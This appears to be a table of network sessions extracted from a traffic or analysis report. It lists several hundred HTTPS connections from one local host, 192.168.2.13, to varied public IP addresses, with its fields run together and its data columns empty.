                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17047192.168.2.1341152108.252.172.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17048192.168.2.1354908175.32.20.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17049192.168.2.1352550159.60.112.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17050192.168.2.1339858122.23.163.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17051192.168.2.1351456150.192.131.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17052192.168.2.1335964181.136.112.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17053192.168.2.1354096143.201.139.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17054192.168.2.1346660134.123.222.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17055192.168.2.133790849.183.125.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17056192.168.2.1345306175.4.49.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17057192.168.2.1357008157.38.11.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17058192.168.2.1349908126.99.59.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17059192.168.2.1342922182.154.207.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17060192.168.2.1333164199.30.34.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17061192.168.2.1343824120.62.55.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17062192.168.2.134787095.47.158.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17063192.168.2.1357034126.122.230.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17064192.168.2.1343214158.49.218.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17065192.168.2.1358032168.7.250.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17066192.168.2.133289496.248.219.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17067192.168.2.1343246187.58.20.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17068192.168.2.1355722217.231.114.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17069192.168.2.1341298121.169.124.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17070192.168.2.1360420184.227.6.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17071192.168.2.133956236.102.32.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17072192.168.2.1353964143.37.196.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17073192.168.2.1333404153.120.105.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17074192.168.2.1350846170.104.208.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17075192.168.2.1352754120.162.57.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17076192.168.2.135602663.218.107.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17077192.168.2.133698261.254.176.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17078192.168.2.135745878.140.65.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17079192.168.2.135461243.33.146.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17080192.168.2.136042227.118.225.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17081192.168.2.1336046200.216.145.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17082192.168.2.1352702146.3.238.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17083192.168.2.1359636104.106.142.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17084192.168.2.133810290.160.113.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17085192.168.2.134196850.126.28.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17086192.168.2.135252278.19.27.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17087192.168.2.134011694.216.217.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17088192.168.2.1358974204.99.13.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17089192.168.2.1338346217.110.51.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17090192.168.2.133327844.209.222.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17091192.168.2.135235269.241.190.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17092192.168.2.1338090108.29.159.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17093192.168.2.1357738149.186.102.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17094192.168.2.1344910191.225.218.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17095192.168.2.134880864.89.57.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17096192.168.2.135916825.7.208.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17097192.168.2.1359786160.20.143.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17098192.168.2.1350992188.139.65.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17099192.168.2.134746485.176.121.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17100192.168.2.1357358152.184.81.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17101192.168.2.133625445.47.52.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17102192.168.2.1339178183.108.120.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17103192.168.2.1350764158.245.131.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17104192.168.2.1336436135.88.46.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17105192.168.2.1350812125.88.59.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17106192.168.2.1360188196.81.127.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17107192.168.2.1359462149.234.92.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17108192.168.2.1354870119.83.167.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17109192.168.2.133501047.71.191.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17110192.168.2.134911675.147.168.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17111192.168.2.1350794135.152.9.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17112192.168.2.1336212184.228.136.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17113192.168.2.1334352217.158.33.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17114192.168.2.1336848155.7.255.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17115192.168.2.134669282.202.24.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17116192.168.2.136064890.93.129.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17117192.168.2.13404209.230.1.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17118192.168.2.1350992141.187.190.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17119192.168.2.1358524186.166.180.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17120192.168.2.13441288.69.0.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17121192.168.2.13588164.172.130.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17122192.168.2.134363665.24.61.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17123192.168.2.134299839.140.190.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17124192.168.2.1357370187.85.245.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17125192.168.2.1335220156.96.87.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17126192.168.2.134651467.94.38.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17127192.168.2.1349194114.74.94.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17128192.168.2.133320462.60.246.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17129192.168.2.1352428181.167.152.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17130192.168.2.13526201.87.59.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17131192.168.2.1353522204.176.249.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17132192.168.2.133956412.94.233.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17133192.168.2.135106099.100.201.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17134192.168.2.1333268138.196.69.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17135192.168.2.1356450216.69.164.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17136192.168.2.1341904193.51.72.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17137192.168.2.1352496169.24.240.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17138192.168.2.1348522145.190.60.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17139192.168.2.133718667.182.31.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17140192.168.2.134879436.123.157.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17141192.168.2.134708220.27.56.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17142192.168.2.135931838.113.237.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17143192.168.2.1359496180.176.239.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17144192.168.2.135317680.145.222.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17145192.168.2.134117072.212.247.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17146192.168.2.1333332143.182.239.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17147192.168.2.133583479.236.115.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17148192.168.2.1352732104.107.175.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17149192.168.2.1345104150.180.86.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17150192.168.2.1333490153.64.46.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17151192.168.2.1336490173.235.13.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17152192.168.2.1346164186.123.48.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17153192.168.2.134751453.9.150.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17154192.168.2.1348350205.150.112.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17155192.168.2.135038084.153.64.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17156192.168.2.1340066101.55.138.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17157192.168.2.1346222110.93.56.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17158192.168.2.1360614159.32.94.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17159192.168.2.133618276.78.92.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17160192.168.2.1337558186.213.129.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17161192.168.2.13406542.73.250.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17162192.168.2.1344968217.22.158.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17163192.168.2.1359882186.43.222.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17164192.168.2.135113027.61.127.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17165192.168.2.136008452.71.133.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17166192.168.2.1343926220.251.223.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17167192.168.2.134934466.28.102.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17168192.168.2.1333428200.98.178.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17169192.168.2.134010063.9.188.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17170192.168.2.1349378209.99.122.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17171192.168.2.1350770177.242.98.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17172192.168.2.135559636.25.62.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17173192.168.2.1337542131.146.133.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17174192.168.2.1337674136.33.214.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17175192.168.2.1343356104.48.64.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17176192.168.2.1343944154.245.60.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17177192.168.2.135024245.32.122.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17178192.168.2.135705064.164.30.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17179192.168.2.1337630152.90.125.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17180192.168.2.134164266.176.107.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17181192.168.2.1333960180.118.158.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17182192.168.2.1338098205.98.227.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17183192.168.2.134263860.127.133.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17184192.168.2.1340626209.235.55.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17185192.168.2.1336894166.156.240.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17186192.168.2.1352664197.37.144.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17187192.168.2.1351938204.60.241.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17188192.168.2.1348938193.129.121.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17189192.168.2.134923290.153.236.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17190192.168.2.1349800162.176.28.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17191192.168.2.1334482222.208.2.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17192192.168.2.1336502192.135.188.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17193192.168.2.134616819.0.151.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17194192.168.2.1348750102.60.32.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17195192.168.2.133871297.151.42.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17196192.168.2.134449275.243.137.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17197192.168.2.1347070200.217.171.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17198192.168.2.1345860109.251.227.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17199192.168.2.1341240182.42.50.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17200192.168.2.1334720123.179.252.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17201192.168.2.1349084126.211.209.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17202192.168.2.1334590115.133.62.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17203192.168.2.133383617.137.117.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17204192.168.2.1347192100.52.107.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17205192.168.2.1353802118.206.244.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17206192.168.2.1349922223.166.226.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17207192.168.2.1337166190.231.167.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17208192.168.2.136044874.178.10.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17209192.168.2.1357386117.217.255.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17210192.168.2.1359044116.73.115.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17211192.168.2.133425431.132.226.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17212192.168.2.135301873.184.201.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17213192.168.2.135592292.245.233.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17214192.168.2.1348256109.239.155.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17215192.168.2.135577850.51.177.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17216192.168.2.1349816207.249.201.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17217192.168.2.1358366203.16.246.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17218192.168.2.1359690134.156.215.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17219192.168.2.1347044129.165.217.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17220192.168.2.1335650115.120.104.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17221192.168.2.136066841.21.184.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17222192.168.2.13564909.185.133.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17223192.168.2.135982687.133.35.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17224192.168.2.134635463.91.248.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17225192.168.2.134610693.44.251.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17226192.168.2.1355326136.214.4.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17227192.168.2.134670276.78.200.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17228192.168.2.135877483.68.5.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17229192.168.2.1360018107.157.212.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17230192.168.2.1335110181.68.214.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17231192.168.2.1344166167.173.140.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17232192.168.2.134361470.71.237.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17233192.168.2.134418613.134.252.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17234192.168.2.1339486188.200.29.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17235192.168.2.1358092162.89.95.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17236192.168.2.134715477.238.166.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17237192.168.2.1360954164.234.157.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17238192.168.2.134911642.167.205.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17239192.168.2.133721640.136.196.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17240192.168.2.136042054.35.218.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17241192.168.2.1352620172.220.17.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17242192.168.2.135947253.67.255.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17243192.168.2.1350808117.164.172.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17244192.168.2.1342546129.122.92.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17245192.168.2.135898466.136.84.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17246192.168.2.134759077.56.193.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17247192.168.2.1343790220.77.189.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17248192.168.2.135585241.45.102.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17249192.168.2.135081436.126.41.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17250192.168.2.1343924216.179.139.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17251192.168.2.133512848.28.32.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17252192.168.2.1339804196.241.124.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17253192.168.2.133297632.115.96.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17254192.168.2.1344222189.64.17.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17255192.168.2.133651632.50.148.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17256192.168.2.1346650149.238.37.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17257192.168.2.1333872161.37.204.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17258192.168.2.135322652.194.222.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17259192.168.2.1334168203.68.35.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17260192.168.2.134900214.150.130.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17261192.168.2.1348642183.216.104.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17262192.168.2.1346714137.86.21.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17263192.168.2.133643675.221.33.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17264192.168.2.133828887.116.27.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17265192.168.2.1338472124.251.0.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17266192.168.2.1349922130.198.175.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17267192.168.2.135217454.208.85.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17268192.168.2.1360600200.45.77.165443
